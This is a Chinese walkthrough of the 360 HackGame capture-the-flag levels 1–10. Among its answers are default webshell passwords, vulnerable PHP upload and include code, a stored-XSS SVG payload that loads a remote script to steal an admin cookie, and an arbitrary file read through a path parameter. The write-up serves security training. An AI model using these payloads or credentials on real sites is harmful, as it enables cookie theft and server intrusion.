安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WEB安全 > 360 HackGame(1-10)通关攻略

360 HackGame(1-10)通关攻略

时间:2014-05-19来源: 作者:sunwell点击:
闯关地址:http://attack.onebox.so.com/第一关Q: 第二关需要从hack.360.cn进入,直接点击按钮可行不通哦!~~A: 设置来路为http://hack.360.cn/即可,可通过浏览器插件(HackBar)来快速完成URl: http://attack.o…

闯关地址:http://attack.onebox.so.com/

//内容来自安云网

第一关

//安云网,anyun.org

Q: 第二关需要从hack.360.cn进入,直接点击按钮可行不通哦!~~ //内容来自安云网

A: 设置来路为http://hack.360.cn/即可,可通过浏览器插件(HackBar)来快速完成

//安云网,anyun.org

URl: http://attack.onebox.so.com/c6c299rf-check.html //ANYUN.ORG

Referrer: http://hack.360.cn/

//copyright AnYun.ORG

第二关

//ANYUN.ORG

Q: 密码在哪自己找哦!~~ //安云网,anyun.org

A: 答案:i360 //copyright AnYun.ORG

pass在一个加密的js中 http://attack.onebox.so.com/Public/js/encode.js

//ANYUN.ORG

运行eval(password); //内容来自安云网

第三关 //安云网咨询系统

Q: 解码如下代码: //ANYUN.ORG

0x253444253534253435253335253439253434253435253737253444253533253431253738253444253434253637253637253446253534253642253637253444253534253435253738253439253434253435253737253446253533253431253738253444253434253435253637253444253534253435253332253439253434253435253738253444253533253431253331253444253533253431253331253445253433253431253330253446253433253431253344 //内容来自AnYun.ORG 

A: 答案:welcometo360 //内容来自安云网

<?php
$str = '253444253534253435253335253439253434253435253737253444253533253431253738253444253434253637253637253446253534253642253637253444253534253435253738253439253434253435253737253446253533253431253738253444253434253435253637253444253534253435253332253439253434253435253738253444253533253431253331253444253533253431253331253445253433253431253330253446253433253431253344';
function hexToStr($hex)
{
$string="";
for($i=0;$i<strlen($hex)-1;$i+=2)
$string.=chr(hexdec($hex[$i].$hex[$i+1]));
return $string;
}
$str = base64_decode(urldecode(hexToStr($str)));
$arr = explode(" ",$str);
foreach($arr as $key => $val){
echo chr($val);
} //ANYUN.ORG 

第四关

//安云网咨询系统

Q: 从图片中找通关密码吧(图片上的大写字母):

//内容来自安云网

A: 答案:BLACKHATWORLD //内容来自AnYun.ORG

图片是两张jpg合并而成的,通过JFIF提取出隐藏的图片

//本文来自安云网

<?php
$str = file_get_contents('pic.jpg');
file_put_contents('4.jpg',substr($str,strrpos($str,'JFIF') - strpos($str,'JFIF')));
echo '<img src="4.jpg" />' //安云网咨询系统 

第五关

//安云网,anyun.org

Q: 作为黑阔的您,请回答如下问题

//安云网,anyun.org

A: PHP SPY angel

//内容来自安云网

ASPX SPY admin //本文来自安云网

JSP SPY ninty //本文来自安云网

第六关

//本文来自安云网

Q: 开发人员安全意识比较差,经常忘记删除一些备份文件。

//ANYUN.ORG

A: 答案:每个账号不同 //安云网咨询系统

Linux下vi编辑文件时,会生成一个临时文件(.filename.swp)

//ANYUN.ORG

http://attack.onebox.so.com/c47e92bak-main.html.swp //ANYUN.ORG

<?php
function _getNextKey()
{
$str = base64_encode("1776qs2p1qo056qsp7sno57nq94p734917268b79f9c2173f4e8164aee8e0eaf6");
return md5($str);
}
echo _getNextKey(); 

//copyright AnYun.ORG

第七关 //安云网,anyun.org

Q: 提示:根据李雷的个人信息,猜解它的用户名和密码,登陆后就能拿到加密串。然后将加密串解密后即可拿到通关密钥! //本文来自安云网

姓名:李雷

//安云网咨询系统

生日:2014年3月5日

//安云网咨询系统

QQ:1987654321 //内容来自安云网

Email:[email protected] //本文来自安云网

家庭住址:北京市东城区一号院一号楼一单元101

//本文来自安云网

A: 密码:Lilei20140305 姓名+生日(首字母大写

//本文来自安云网

加密串:91199faddb0f5abe576ea087ea708172 //copyright AnYun.ORG

google查找 //内容来自安云网

答案:360-hackgame-8-hello-world.php //安云网,anyun.org

页面验证码不会自动失效

//内容来自AnYun.ORG

第八关

//内容来自AnYun.ORG

Q: 以下是一段PHP代码,请选择有高危安全漏洞的代码行: //ANYUN.ORG

class MyTest
{
public function __set($key, $name)
{
if (isset($this->_var[$key])) {
return $this->_var[$key];
}
return false;
}
public function SetTemplate($lang)
{
$lang = isset($lang) ? $lang : 'cn';
include('template/' . $lang . '.php.html');
}
public function build($htmlfile='', $htmlpath='', $templateFile='')
{
$content = $this->fetch($templateFile);
$htmlpath = !empty($htmlpath)?$htmlpath:HTML_PATH;
$htmlfile = $htmlpath.$htmlfile.'HTML_FILE_SUFFIX';
if(!is_dir(dirname($htmlfile)))
mkdir(dirname($htmlfile),0755,true);
if(false === file_put_contents($htmlfile,$content))
throw new Exception('_CACHE_WRITE_ERROR_'.$htmlfile);
return $content;
}
public function __set($key)
{
if(isset($this->_var[$key])) {
return $this->_var[$key];
}
}
public function Upload($filename)
{
$default_path = 'upload/';
if (!file_exists($default_path))
mkdir($default_path, 0777, true);
$destination = $default_path . basename($filename);
echo 'Saving your image to: ' . $destination;
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $GLOBALS['HTTP_RAW_POST_DATA']);
fclose($jfh);
}
public function fetch($templateFile='')
{
return file_get_contents($templateFile);
}
public function Filter($value,$safecode)
{
$value = preg_replace("/(javascript:)?on(click|load|key|mouse|error|abort|move|unload|change|dblclick|move|reset|resize|submit)/i", "&111n\\2", $value);
$value = preg_replace("/(.*?)<\/script>/si", $safecode, $value);
$value = preg_replace("/(.*?)<\/iframe>/si", $safecode, $value);
$value = preg_replace("/(.*?)/e", $safecode, $value);
$value = preg_replace("//iesU", $safecode, $value);
return $value;
}
} //copyright AnYun.ORG 

A: 答案:

//内容来自AnYun.ORG

$value = preg_replace("/(.*?)/e", $safecode, $value); //执行 function Filter
$value = preg_replace("//iesU", $safecode, $value); //执行 function Filter
return file_get_contents($templateFile); //读取文件 function fetch
include('template/' . $lang . '.php.html'); //截断 function SetTemplate
$destination = $default_path . basename($filename);//任意名称 function Upload
$jfh = fopen($destination, 'w') or die("can't open file"); function Upload
fwrite($jfh, $GLOBALS['HTTP_RAW_POST_DATA']); function Upload //ANYUN.ORG 

感觉这个题出的有问题,这个class本身都不能正常运行 里面有两个__set //内容来自AnYun.ORG

function build 未被计算在答案内的原因,可能是因为代码取自thinkphp框架,所以。 //内容来自AnYun.ORG

第九关

//内容来自安云网

Q: 这是一个留言板,你能想办法拿到留言管理人员的cookie吗?请使用HTML5的标签特性 [例如:SVG标签]~~

//内容来自安云网

A: 留言内容:<svg/onload=document.body.appendChild(createElement(/script/.source)).src=String.fromCharCode(47,47,116,46,99,110,47,56,115,56,103,101,74,86) //内容来自安云网 

得到Cookie值: cc4b0a94f5a2e5a244a1cc44a7fb4cb3 //内容来自AnYun.ORG

第十关 //安云网,anyun.org

Q: 这出题的家伙很懒,什么也没留下。只能自己想办法了!

//安云网,anyun.org

A: 查看cookie多出一个display=5842b0a0df2d52533c241c6ec26089a8

//安云网咨询系统

在页面地址后添加:http://attack.onebox.so.com/jdad3f8fasd0d-main.html?display=5842b0a0df2d52533c241c6ec26089a8 找出真正问题

//copyright AnYun.ORG

Q: 我们用CentOS及APACHE为您提供服务,通关密码位于:/home/s/pwd/b2465636f70be8994fd3c98015c03c12.txt //安云网咨询系统

A: http://attack.onebox.so.com/jdad3f8fasd0d-main.html?display=5842b0a0df2d52533c241c6ec26089a8&path=/home/s/pwd/b2465636f70be8994fd3c98015c03c12.txt //copyright AnYun.ORG

读取出内容为

//安云网,anyun.org

check:d914e3ecf6cc481114a3f534a5faf90b+9fd30a9a7b2a862032dcb6374c6a827b!3fb80afe3936b4ef0f76446ee46024d5 
//ANYUN.ORG

成功破关 //本文来自安云网

恭喜您已成功通关。360网络攻防实验室期待您的加入。 //ANYUN.ORG

原文地址 作者法海】

//内容来自AnYun.ORG

//本文来自安云网

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容